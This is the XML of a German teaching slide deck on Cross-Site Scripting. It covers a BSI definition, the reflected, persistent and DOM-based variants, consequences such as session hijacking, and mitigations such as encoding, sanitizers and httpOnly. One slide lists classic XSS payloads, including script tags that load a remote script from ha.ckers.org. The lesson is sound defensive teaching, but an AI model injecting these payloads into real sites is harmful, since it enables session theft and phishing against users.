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1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7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D511-0357-1843-BDC3-0292F8281113}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27.01.12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CC644-ADC0-2A44-B685-9105447D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Cross-Site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SFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>27. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Januar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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976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BSI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Ausnutzen einer Sicherheitslücke, indem Informationen aus einem Kontext, in dem sie nicht vertrauenswürdig sind, in einen anderen Kontext eingefügt werden, in dem sie als vertrauenswürdig eingestuft werden.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2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via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516"/>
            <a:ext cx="8229600" cy="28866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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;alert("XSS");&lt;/script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>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>SCRIPT SRC=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ha.ckers.org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err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xss.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;&lt;/SCRIPT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ourier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ha.ckers.org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xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;&lt;/SCRIPT&gt;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>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;”&gt;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>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>BODY ONLOAD=alert('XSS')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4770" y="1792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de-DE" sz="2400" dirty="0"/>
              <a:t>Entführen der Session</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t>Website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>Defacements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t>Phishing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de-DE" sz="2400" dirty="0"/>
              <a:t>die Kontrolle des Browsers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058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Angriffsarten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Reflexiv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0"/>
              <a:t>Benutzereingabe wird direkt wieder zurückgesendet</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0"/>
              <a:t>Eine Website-Suche antwortet: "Keine Ergebnis für »Suchbegriff«“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Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Schadcode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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> auf Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gespeichert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Gästebuch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DOM-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>basiert</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Rein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Clientseitig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>schreibt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> URL Parameter ins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Dokument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721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Encoden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Escapen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Escaping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>CSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Escaping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML Sanitizers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP-flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>httpOnly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7606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201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Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Definition BSI</vt:lpstr>
      <vt:lpstr>XSS via JavaScript</vt:lpstr>
      <vt:lpstr>Angriffsarten</vt:lpstr>
      <vt:lpstr>Mitigation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Cross-Site Scripting</dc:title>
  <dc:creator>M L</dc:creator>
  <cp:lastModifiedBy>M L</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-01-25T22:26:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-01-27T09:34:44Z</dcterms:modified>
</cp:coreProperties>
</file>